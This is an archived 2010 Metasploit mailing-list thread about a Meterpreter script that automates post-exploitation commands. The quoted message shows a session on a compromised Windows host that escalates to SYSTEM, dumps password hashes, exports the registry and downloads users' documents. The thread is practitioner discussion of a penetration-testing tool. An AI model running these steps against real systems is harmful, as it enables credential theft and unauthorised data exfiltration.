Home page logo

metasploit logo Metasploit mailing list archives

Re: multi_console_command script testdrive
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sat, 24 Apr 2010 14:01:00 -0400

Glad you liked it, I do have to say I might eliminate multiscript for this one, multicommand has the option of saving output to a file so it might be used like scraper or winenum for running specific commands and saving their output. Again thanks for the request and glad I could help


Sent from my Mobile Phone

On Apr 24, 2010, at 1:24 PM, Sherif El-Deeb <archeldeeb () gmail com> wrote:

The multi_console_command script has been added as an answer to a request to run multiple meterpreter commands from a file, It's working perfectly "as expected of course" :)

This script, IMHO, is the most useful one for post exploitation automation.

Thank you Carlos, yet again.


msf exploit(handler) > cat /root/test.rc
[*] exec: cat /root/test.rc

use priv
run hashdump
run scraper
run search_dwld c:\\ free '.(jpg|doc|docx|xls|xlsx|pdf)$'

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run multi_console_command -s /root/test.rc
[*] Running Command List ...
[*]     Running command screenshot
Screenshot saved to: /root/FFsygzcJ.jpeg
[*]     Running command use priv
[*]     Running command getsystem
...got system (via technique 1).
[*]     Running command run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a2390068e5bxxxxx26caa0902ff21f8a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
[*]     Running command run scraper
[*] New session on xx.211.145.145:54276...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: 87
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*] Downloading HKCU (C:\Users\SHERIF~1\AppData\Local\Temp \LwPhbvul.reg)
[*]     Running command rev2self
[*] Running command run search_dwld c:\\ free '.(jpg|doc|docx| xls|xlsx|pdf)$'

Downloading 'c:\\1.jpg' to '/tmp/c_1.jpg'

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter >

checkvm is fine.

Side note: I noticed that the hash dumping process in the scraper script is not successful, even with system privs. "VistaSP2_x86", that's why I usually use "run hashdump" which works just fine.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]